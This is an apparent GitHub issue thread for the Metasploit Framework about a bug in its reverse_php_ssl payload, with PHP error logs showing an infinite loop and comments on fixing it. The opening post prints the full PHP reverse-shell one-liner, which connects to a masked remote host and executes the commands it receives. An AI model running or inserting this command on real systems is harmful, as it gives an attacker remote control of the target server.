### ISSUE TITLE
Infinite loop by cmd/unix/reverse_php_ssl payload due to missing checking return value

### ISSUE THREAD

**Issue by emanuelb** [rapid7/metasploit-framework#8672]
Using the payload `cmd/unix/reverse_php_ssl` which generate the below command:
```
php -r '$s=fsockopen("ssl://***.***.***.***",443);while(!feof($s)){exec(fgets($s),$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}'&
```

Trigger infinite loop on target (php script that vulnerable to command injection on apache+linux) with CPU usage >= 90% and the apache error_log is filled with repeated messages:

```
PHP Warning:  fputs() expects parameter 1 to be resource, boolean given in Command line code on line 1
PHP Warning:  feof() expects parameter 1 to be resource, boolean given in Command line code on line 1
PHP Warning:  fgets() expects parameter 1 to be resource, boolean given in Command line code on line 1
PHP Warning:  exec(): Cannot execute a blank command in Command line code on line 1
PHP Warning:  implode(): Invalid arguments passed in Command line code on line 1
PHP Warning:  fputs() expects parameter 1 to be resource, boolean given in Command line code on line 1
PHP Warning:  feof() expects parameter 1 to be resource, boolean given in Command line code on line 1
PHP Warning:  fgets() expects parameter 1 to be resource, boolean given in Command line code on line 1
PHP Warning:  exec(): Cannot execute a blank command in Command line code on line 1
PHP Warning:  implode(): Invalid arguments passed in Command line code on line 1
```

The related error_log messages started with:
```
PHP Warning:  fsockopen(): SSL operation failed with code 1. OpenSSL Error messages:
error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed in Command line code on line 1
PHP Warning:  fsockopen(): Failed to enable crypto in Command line code on line 1
PHP Warning:  fsockopen(): unable to connect to ssl://***.***.***.***:443 (Unknown error) in Command line code on line 1
PHP Warning:  feof() expects parameter 1 to be resource, boolean given in Command line code on line 1
PHP Warning:  fgets() expects parameter 1 to be resource, boolean given in Command line code on line 1
PHP Warning:  exec(): Cannot execute a blank command in Command line code on line 1
PHP Warning:  implode(): Invalid arguments passed in Command line code on line 1
```

thus, there are 2 bugs to fix:

1. ensure the variable that passed to feof function is resource/cast-to-true. for example: 
`if($var){while(!feof($var))....}` or `if(is_resource($var)){while(!feof($var))....}`
2. disable ssl certificate validation via verify_peer option or use ca-based-certificate instead of self-signed and set the php script to trust the ca?

Note: the verify_peer default value changed to TRUE in php 5.6.0, which is probably the cause of the issue.

**Comment by sempervictus** [comment]
These were written a while back, so we probably need to differentiate payloads for old and new php SSL configurations. Im not a php expert, so if you're interested in tackling this - please have at. Otherwise, I'll add it to my to do list

**Comment by gauravdesale** [comment]
I would like to contribute to this so I made a new file to check if the ssl certificate is correct with the if template you provided but I cannot push the changes should I make a new branch?

**Comment by void-in** [comment]
@gauravdesale this is a github issue. For changes to push, you would have to generate a pull request.

**Comment by bwatters-r7** [comment]
@gauravdesale Where is the code?  Do you have a branch/repo/etc we could see?  We'd be happy to help you through the process.

**Comment by kkirsche** [comment]
I noticed that #9584 was merged, should this issue also be closed?

**Comment by wvu-r7** [comment]
Yes! Thank you.
